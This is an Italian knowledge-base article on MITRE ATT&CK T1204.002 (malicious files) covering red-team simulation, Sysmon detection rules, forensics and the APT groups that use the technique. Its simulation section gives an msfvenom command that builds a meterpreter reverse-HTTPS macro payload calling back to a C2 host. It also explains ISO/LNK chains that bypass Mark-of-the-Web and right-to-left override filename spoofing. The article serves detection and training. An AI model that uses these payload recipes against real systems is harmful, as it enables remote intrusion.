File Malevoli e Ingegneria Sociale: Malicious File (T1204.002)

La simulazione di Malicious File in laboratorio è un esercizio fondamentale per testare la resilienza della catena di detection: mail gateway, sandbox, EDR ed endpoint ASR rules devono tutti reagire. L'obiettivo del red teamer non è esfiltrare dati, ma verificare quanti strati difensivi rilevano e bloccano l'esecuzione.

Documenti Office con macro malevole. Il punto di partenza classico è un documento Word con macro VBA che lancia un processo figlio. Con msfvenom (open source, parte di Metasploit Framework) si genera un payload VBA da incollare nel modulo macro:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP-C2> LPORT=443 -f vba-psh -o macro_payload.vba

Il file .docm risultante va testato con macro abilitate: il SOC dovrebbe osservare WINWORD.EXE che genera powershell.exe o cmd.exe. Per scenari più sofisticati, Villain (open source) offre la generazione di payload HTA e stager personalizzati che emulano catene di esecuzione reali.

Catene ISO → LNK → DLL. Questa tecnica, resa celebre da campagne come quella di EXOTIC LILY con file ISO contenenti LNK nascosti, si replica facilmente. Si crea un'immagine ISO con mkisofs (open source) contenente un file LNK che punta a rundll32.exe per caricare una DLL malevola co-residente:

mkisofs -o payload.iso -J -R /tmp/iso_staging/

All'interno della directory di staging si posizionano il file LNK (creabile con pylnk3, open source) e una DLL di test generata con msfvenom. Il doppio clic sul LNK dentro l'ISO montata in Windows bypassa il Mark-of-the-Web, un aspetto critico da validare.

File mascherati e doppia estensione. Per testare i filtri basati su estensione, si possono creare eseguibili con naming ingannevole sfruttando il carattere Unicode Right-to-Left Override (RLE). Un semplice test consiste nel rinominare un eseguibile inserendo il carattere U+202E nel nome: il file apparirà con estensione .pdf nell'Explorer pur essendo un .exe.

Payload macOS. Per ambienti Apple, Mythic (open source) con l'agente Poseidon o Apfell permette di generare applicazioni .app camuffate o DMG malevoli, replicando scenari analoghi a quelli documentati per OSX/Shlayer e Bundlore.

Come validazione finale, si verifica la catena con Atomic Red Team (open source): il test T1204.002 contiene diversi atomics che simulano l'apertura di documenti con macro e l'esecuzione da percorsi utente tipici.

La detection di Malicious File non si basa sulla firma del file — quella è responsabilità dell'antivirus — ma sulla correlazione comportamentale: un'applicazione utente scrive un file in un percorso controllato dall'utente, e subito dopo compare un processo figlio sospetto. Il cuore della strategia è la catena file-write → child-spawn, monitorata entro una finestra temporale stretta.

Log source primario: Sysmon su Windows. Gli eventi critici sono tre. L'EventCode 11 (FileCreate) traccia la scrittura di file in percorsi come Downloads, %TEMP%, Desktop e AppData. L'EventCode 1 (ProcessCreate) cattura il processo figlio generato dall'applicazione handler. L'EventCode 15 (FileCreateStreamHash) segnala i file con Alternate Data Stream e Mark-of-the-Web — fondamentale per distinguere file scaricati da Internet.

La regola di correlazione deve collegare un FileCreate con estensione sospetta (.exe, .scr, .lnk, .pif, .cpl, .js, .vbs, .bat, .hta, .iso, .docm, .xlsm) a un ProcessCreate dove il processo padre è un'applicazione utente nota (WINWORD.EXE, EXCEL.EXE, OUTLOOK.EXE, explorer.exe, AcroRd32.exe) e il figlio è un interprete o loader di sistema (powershell.exe, wscript.exe, cmd.exe, regsvr32.exe, rundll32.exe, msiexec.exe). La finestra temporale ideale è 0-5 minuti tra i due eventi.

Gestione dei falsi positivi. Le principali fonti di rumore sono gli aggiornamenti software legittimi che eseguono installer da percorsi utente e gli script di automazione aziendale basati su macro. Per ridurli è necessario mantenere una whitelist di signer (publisher) attendibili e una mappa delle applicazioni parent legittime per l'organizzazione. Le regole ASR (Attack Surface Reduction) di Microsoft Defender, in particolare quelle che bloccano le applicazioni Office dal creare processi figlio e dall'eseguire contenuto eseguibile, rappresentano un controllo preventivo estremamente efficace.

macOS e Linux. Su macOS il focus è sugli eventi EndpointSecurity: file creation in ~/Downloads o ~/Library seguito da exec di osascript, bash, curl o chmod entro 10 minuti. L'attributo com.apple.quarantine sul file aumenta la confidenza dell'alert. Su Linux, auditd con regole su syscall openat, creat, execve permette di correlare scritture in ~/Downloads o /tmp con esecuzioni successive di interpreti come bash, python, perl. Il tuning richiede il mapping delle applicazioni desktop (LibreOffice, Evince, Firefox) come parent legittimi.

Un indicatore rapido ad alta fedeltà: qualsiasi processo figlio di WINWORD.EXE o EXCEL.EXE che non sia splwow64.exe (spooler di stampa) merita indagine immediata.

L'analisi forense di un'intrusione iniziata con Malicious File segue una sequenza precisa: identificare il vettore di consegna, ricostruire il momento dell'apertura, tracciare la catena di esecuzione e determinare le azioni successive. Ogni fase lascia artefatti specifici.

Il punto di ingresso: email e browser. Il file malevolo arriva quasi sempre via posta elettronica o download web. Sui sistemi Windows, la prima tappa è il file di posta — il file .ost o .pst di Outlook — dove cercare il messaggio originale con l'allegato. In parallelo, i log del mail gateway (se disponibili) forniscono timestamp, mittente e hash dell'allegato. Per file scaricati dal browser, la cronologia dei download di Chrome (file History, database SQLite, tabella downloads) o il file places.sqlite di Firefox contengono URL sorgente, timestamp e percorso di destinazione.

Mark-of-the-Web e Zone.Identifier. Ogni file scaricato da Internet o ricevuto via email su Windows riceve un Alternate Data Stream denominato Zone.Identifier con il valore ZoneId=3 (Internet). Questo artefatto è cruciale: la sua presenza conferma l'origine esterna del file. Si estrae con:

Get-Content -Path "C:\Users<utente>\Downloads<file>" -Stream Zone.Identifier

Attenzione però: i file estratti da ISO o VHD montati in Windows non ereditano il Mark-of-the-Web, motivo per cui la catena ISO → LNK è particolarmente insidiosa. L'assenza stessa del Zone.Identifier su un file sospetto in Downloads può indicare l'uso di un container ISO.

Prefetch e timeline di esecuzione. I file Prefetch (C:\Windows\Prefetch) documentano l'esecuzione di ogni binario con timestamp e conteggio. Con PECmd di Eric Zimmerman (open source) si parsano i file .pf per ricostruire la sequenza: l'apertura di WINWORD.EXE seguita da POWERSHELL.EXE o CMD.EXE a distanza di secondi è una firma classica di macro malevola. La Shimcache (AppCompatCache, nel registry SYSTEM) e la chiave Amcache (Amcache.hve) forniscono evidenze complementari sull'esecuzione, anche se il Prefetch è stato cancellato.

Artefatti specifici per documenti Office. I file .docm e .xlsm possono essere analizzati con oletools (open source), in particolare olevba per estrarre il codice macro e oleid per identificare indicatori di rischio. I file Recent (percorso %APPDATA%\Microsoft\Office\Recent) e le jump list dell'utente confermano l'apertura del documento con timestamp preciso.

Su macOS, il database di quarantena (com.apple.LaunchServices.QuarantineEventsV2, database SQLite in ~/Library/Preferences) registra ogni file scaricato con URL sorgente e timestamp. Su Linux, in assenza di artefatti nativi equivalenti, il focus si sposta su bash_history, i log di auditd (se configurati) e i metadati dei file manager (come recently-used.xbel in ~/.local/share).

La timeline integrata — costruibile con plaso/log2timeline (open source) — deve correlare il timestamp di ricezione email, la scrittura del file, l'apertura del documento e il primo processo figlio anomalo.

Con 84 gruppi che impiegano questa tecnica, Malicious File è trasversale a qualsiasi area geografica, settore e livello di sofisticazione. Il valore per l'intelligence non sta nel rilevare chi la usa, ma nel come — le varianti operative distinguono i cluster e permettono attribuzioni.

APT29 e la catena ISO-LNK. Il gruppo russo ha affinato una delivery chain che combina documenti PDF, file LNK e allegati in formati multipli. In sinergia, EXOTIC LILY — broker di accesso iniziale collegato a operazioni ransomware — ha industrializzato la tecnica dei file ISO contenenti LNK malevoli e DLL nascoste, un pattern che ha definito un'intera stagione di campagne tra il 2021 e il 2022. Il monitoraggio di IcedID e Bumblebee come payload iniziali all'interno di queste catene consente di tracciare la filiera dall'accesso iniziale fino al ransomware.

Lazarus Group e il social engineering tematico. Attraverso campagne come Operation Dream Job (C0022) e Operation Sharpshooter (C0013), il gruppo nordcoreano ha perfezionato l'uso di documenti Word e PDF con esche lavorative nei settori difesa, aerospazio e governo. La variante più recente, rappresentata da Contagious Interview e dal malware BeaverTail, estende lo schema ai colloqui tecnici fittizi con progetti JavaScript trojanizzati — un'evoluzione che colpisce direttamente il settore tech. Kimsuky, anch'esso nordcoreano, predilige file LNK con nomi personalizzati e false estensioni, distinguendosi per l'elevata personalizzazione delle esche.

Sandworm Team e l'uso operativo in campagne distruttive. Durante l'attacco alla rete elettrica ucraina del 2015 (C0028), il gruppo ha distribuito documenti Office con macro che attivavano automaticamente BlackEnergy. Questo caso dimostra che Malicious File non è esclusiva dello spionaggio: è il vettore di ingresso anche per operazioni di sabotaggio infrastrutturale.

Il cluster finanziario. Wizard Spider ha utilizzato macro Word per distribuire in sequenza Emotet, TrickBot, BokBot e Bazar, alimentando una catena che porta al ransomware Conti. La campagna Water Curupira Pikabot Distribution (C0037) del 2023 ha replicato lo stesso modello operativo dopo il takedown di QakBot, distribuendo installer Pikabot tramite ZIP protetti da password e IMG con LNK e DLL offuscate, per poi deploy-are Cobalt Strike e Black Basta. FIN7 ha sviluppato una variante sofisticata: immagini embedded nei documenti che nascondono file LNK, distribuzione di JSS Loader e del backdoor Harpy attraverso file Office apparentemente legittimi.

Un trend consolidato: la migrazione dai documenti con macro — penalizzati dal blocco predefinito di Microsoft delle macro VBA da Internet — verso container come ISO, IMG, VHD e archivi compressi. Chi difende deve aspettarsi che questi formati sostituiscano progressivamente i .docm tradizionali come vettore primario.

Framework MITRE ATT&CK: T1204.002 (Malicious File), TA0002 (Execution). Campagne: C0037, C0016, C0001, C0005, C0015, C0011, C0022, C0028, C0047, C0006, C0013. Mitigazioni: M1038, M1040, M1017. Detection: Sysmon, auditd, macOS EndpointSecurity. Integrato con conoscenza professionale per tool e procedure operative.